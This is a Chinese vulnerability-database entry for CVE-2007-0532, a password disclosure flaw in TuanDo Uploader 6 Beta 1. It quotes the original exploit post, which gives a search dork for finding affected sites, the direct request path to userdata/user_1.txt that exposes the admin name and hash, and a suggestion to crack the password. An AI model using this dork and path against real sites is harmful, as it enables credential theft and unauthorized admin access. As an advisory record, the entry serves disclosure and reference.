Uploader 'userdata/user_1.txt' 密码信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191971 漏洞类型 未知
发布时间 2007-01-25 更新时间 2007-01-25
CVE编号 CVE-2007-0532 CNNVD-ID CNNVD-200701-432
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/86726
https://cxsecurity.com/issue/WLB-2007010102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-432
|漏洞详情
TuanDoUploader(又称php-uploader)6beta1在web根下储存敏感信息而未赋予足够的访问限制,这使得远程攻击者可以借助一个对userdata/user_1.txt的直接请求,获得管理员密码信息。
|漏洞EXP
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Uploader <= (userdata/user_1.txt) Password Disclosure Vulnerability

Script: Uploader

Version: 6 Beta 1

Dork: "Uploader Version 6 Beta 1"

Found By : BorN To K!LL

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Explo!T:.
^^^^^
www.site.com/[upload-path]/userdata/user_1.txt

as We see  Admin name & Hash .....
crack the password  .... :)

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

GreeTz To :

Dr.2  ,  Asbmay  ,  General C  ,  ToOoFa  ,  Q8^RoCK  ,  SHiKaA  ,  str0ke  
,  ThE-LoRd-Of-CrAcKiNg

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
|受影响的产品
Tuan Do Uploader 6 Beta 1
|参考资料

来源:XF
名称:uploader-userdata-info-disclosure(31683)
链接:http://xforce.iss.net/xforce/xfdb/31683
来源:BUGTRAQ
名称:20070122Uploader<=(userdata/user_1.txt)PasswordDisclosureVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/457698/100/0/threaded
来源:SREASON
名称:2187
链接:http://securityreason.com/securityalert/2187